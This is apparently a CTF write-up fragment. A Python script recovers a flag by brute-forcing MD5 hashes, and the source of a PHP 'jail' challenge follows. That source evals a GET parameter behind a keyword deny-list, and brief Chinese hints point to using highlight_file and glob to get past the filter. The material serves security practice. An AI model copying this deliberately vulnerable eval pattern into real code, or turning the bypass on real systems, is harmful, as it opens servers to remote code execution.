md5_array = ["3295c76acbf4caaed33c36b1b5fc2cb1","26657d5ff9020d2abefe558796b99584","73278a4a86960eeb576a8fd4c9ec6997","ec8956637a99787bd197eacd77acce5e","e2c420d928d4bf8ce0ff2ec19b371514","43ec517d68b6edd3015b3edc9a11367b","ea5d2f1c4608232e07d3aa3d998e5135","c8ffe9a587b126f152ed3d89a146b445","072b030ba126b2f4b2374f342be9ed44","c9e1074f5b3f9fc8ea15d152add07294","093f65e080a295f8076b1c5722a46aa2","66f041e16a60928b05a7e228a89c3799","9f61408e3afb633e50cdf1b20de6f466","9a1158154dfa42caddbd0694a4e9bdc8","9f61408e3afb633e50cdf1b20de6f466","a684eceee76fc522773286a895bc8436","7f39f8317fbdb1988ef4c628eba02591","eb160de1de89d9058fcb0b968dbbbd68","c45147dee729311ef5b5c3003946c48f","7f6ffaa6bb0b408017b62254211691b5","07e1cd7dca89a1678042477183b7ac3f","9f61408e3afb633e50cdf1b20de6f466","e369853df766fa44e1ed0ff613f563bd","5ef059938ba799aaa845e1c2e8a762bd","a1d0c6e83f027327d8461063f4ac58a6","a1d0c6e83f027327d8461063f4ac58a6","b53b3a3d6ab90ce0268229151c9bde11","a0a080f42e6f13b3a2df133f073095dd","17e62166fc8586dfa4d1bc0e1742c08b","3416a75f4cea9109507cacd8e2f2aefc","a5771bce93e200c36f7cd9dfd0e5deaa","c0c7c76d30bd3dcaefc96f40275bdc0a","a3f390d88e4c41f2747bfa2f1b5f87db","6f4922f45568161a8cdf4ad2299f6d23","98f13708210194c475687be6106a3b84","37693cfc748049e45d87b8c7d8b9aacd","7cbbc409ec990f19c78c75bd1e06f215","1f0e3dad99908345f7439f8ffabdffc4","34173cb38f07f89ddbebc2ac9128303f","70efdf2ec9b086079795c442636b55fb","35f4a8d465e6e1edc05f3d8ab658c551","02e74f10e0327ad868d138f2b4fdd6f0","d1fe173d08e959397adf34b1d77e88d7","1f0e3dad99908345f7439f8ffabdffc4","43ec517d68b6edd3015b3edc9a11367b"]
flag = ''
# Only 256 candidates per position: hash str(j ^ index) for every byte value and keep the match.
for index, i in enumerate(md5_array):
    for j in range(256):
        if hashlib.md5(str(j ^ index).encode()).hexdigest() == i:
            flag += chr(j)
print(flag)
ez_php_jail
源码
<?php
highlight_file(__FILE__);
error_reporting(0);
include("hint.html");
// Note the dot in the parameter name: PHP normally rewrites '.' in incoming request keys to
// '_', so a straightforwardly named query parameter does not populate this key.
$Jail = $_GET['Jail_by.Happy'];
// Loose == null: an empty string compares equal as well and is treated as absent.
if($Jail == null) die("Do You Like My Jail?");
// Case-insensitive deny-list over the raw input. NOTE(review): a character/keyword deny-list in
// front of eval() is not a security boundary — whatever remains is still full PHP grammar.
function Like_Jail($var) {
if (preg_match('/(`|\$|a|c|s|require|include)/i', $var)) {
return false;
}
return true;
}
// eval() of the request value once the deny-list passes — the actual code-execution sink.
if (Like_Jail($Jail)) {
eval($Jail);
echo "Yes! you escaped from the jail! LOL!";
} else {
echo "You will Jail in your life!";
}
echo "\n";
// Output the PHP source after the HTML has been parsed
?>
执行highlight_file
利用glob
进行通配符查找